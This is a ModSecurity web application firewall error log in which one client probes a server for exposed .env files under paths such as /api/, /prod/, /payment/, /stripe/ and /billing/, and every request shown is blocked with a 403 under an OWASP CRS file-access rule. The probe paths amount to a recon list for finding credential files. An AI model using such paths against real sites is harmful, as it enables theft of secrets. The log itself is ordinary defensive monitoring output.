[Fri Dec 05 08:49:26.638847 2025] [:error] [pid 532218] [client 195.178.110.155:49848] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTKOhhxEmzMMD18wwRgEigAAAAI"]
[Fri Dec 05 08:49:26.639087 2025] [:error] [pid 532218] [client 195.178.110.155:49848] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTKOhhxEmzMMD18wwRgEigAAAAI"]
[Fri Dec 05 08:49:26.639286 2025] [:error] [pid 532218] [client 195.178.110.155:49848] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTKOhhxEmzMMD18wwRgEigAAAAI"]
[Fri Dec 05 08:49:45.994731 2025] [:error] [pid 532216] [client 195.178.110.155:37590] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTKOmetJvXQe_RlCiczYBgAAAAA"]
[Fri Dec 05 08:49:45.994986 2025] [:error] [pid 532216] [client 195.178.110.155:37590] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTKOmetJvXQe_RlCiczYBgAAAAA"]
[Fri Dec 05 08:49:45.995190 2025] [:error] [pid 532216] [client 195.178.110.155:37590] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTKOmetJvXQe_RlCiczYBgAAAAA"]
[Fri Dec 05 08:49:59.906380 2025] [:error] [pid 532226] [client 195.178.110.155:53076] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aTKOp-0tnvJIONeyH4oeNQAAAAE"]
[Fri Dec 05 08:49:59.906637 2025] [:error] [pid 532226] [client 195.178.110.155:53076] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aTKOp-0tnvJIONeyH4oeNQAAAAE"]
[Fri Dec 05 08:49:59.906860 2025] [:error] [pid 532226] [client 195.178.110.155:53076] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aTKOp-0tnvJIONeyH4oeNQAAAAE"]
[Fri Dec 05 08:50:04.679517 2025] [:error] [pid 532226] [client 195.178.110.155:53076] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aTKOrO0tnvJIONeyH4oeNgAAAAE"]
[Fri Dec 05 08:50:04.679760 2025] [:error] [pid 532226] [client 195.178.110.155:53076] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aTKOrO0tnvJIONeyH4oeNgAAAAE"]
[Fri Dec 05 08:50:04.679971 2025] [:error] [pid 532226] [client 195.178.110.155:53076] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aTKOrO0tnvJIONeyH4oeNgAAAAE"]
[Fri Dec 05 08:50:10.576003 2025] [:error] [pid 531699] [client 195.178.110.155:58726] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aTKOsnSwUDhtP0GmSVpyvQAAAII"]
[Fri Dec 05 08:50:10.576264 2025] [:error] [pid 531699] [client 195.178.110.155:58726] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aTKOsnSwUDhtP0GmSVpyvQAAAII"]
[Fri Dec 05 08:50:10.576475 2025] [:error] [pid 531699] [client 195.178.110.155:58726] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aTKOsnSwUDhtP0GmSVpyvQAAAII"]
[Fri Dec 05 08:50:15.498236 2025] [:error] [pid 532219] [client 195.178.110.155:58728] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aTKOtz6l5AnsUvdIyDecdwAAAAM"]
[Fri Dec 05 08:50:15.498534 2025] [:error] [pid 532219] [client 195.178.110.155:58728] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aTKOtz6l5AnsUvdIyDecdwAAAAM"]
[Fri Dec 05 08:50:15.498730 2025] [:error] [pid 532219] [client 195.178.110.155:58728] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aTKOtz6l5AnsUvdIyDecdwAAAAM"]
[Fri Dec 05 08:50:24.376135 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpYQAAAGQ"]
[Fri Dec 05 08:50:24.376412 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpYQAAAGQ"]
[Fri Dec 05 08:50:24.376633 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpYQAAAGQ"]
[Fri Dec 05 08:50:24.422974 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpYgAAAGQ"]
[Fri Dec 05 08:50:24.423208 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpYgAAAGQ"]
[Fri Dec 05 08:50:24.423413 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpYgAAAGQ"]
[Fri Dec 05 08:50:24.447462 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /payment/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/payment/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpYwAAAGQ"]
[Fri Dec 05 08:50:24.447706 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/payment/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpYwAAAGQ"]
[Fri Dec 05 08:50:24.447899 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/payment/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpYwAAAGQ"]
[Fri Dec 05 08:50:24.479713 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /checkout/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/checkout/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpZAAAAGQ"]
[Fri Dec 05 08:50:24.479948 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/checkout/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpZAAAAGQ"]
[Fri Dec 05 08:50:24.480159 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/checkout/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpZAAAAGQ"]
[Fri Dec 05 08:50:24.510932 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stripe/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/stripe/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpZQAAAGQ"]
[Fri Dec 05 08:50:24.511193 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/stripe/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpZQAAAGQ"]
[Fri Dec 05 08:50:24.511408 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/stripe/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpZQAAAGQ"]
[Fri Dec 05 08:50:24.542742 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /billing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/billing/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpZgAAAGQ"]
[Fri Dec 05 08:50:24.542977 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/billing/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpZgAAAGQ"]
[Fri Dec 05 08:50:24.543176 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/billing/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpZgAAAGQ"]
[Fri Dec 05 08:50:24.583022 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpZwAAAGQ"]
[Fri Dec 05 08:50:24.583355 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpZwAAAGQ"]
[Fri Dec 05 08:50:24.583637 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpZwAAAGQ"]
[Fri Dec 05 08:50:24.614477 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aTKOwIKEfmkzHJNA4jGpaAAAAGQ"]
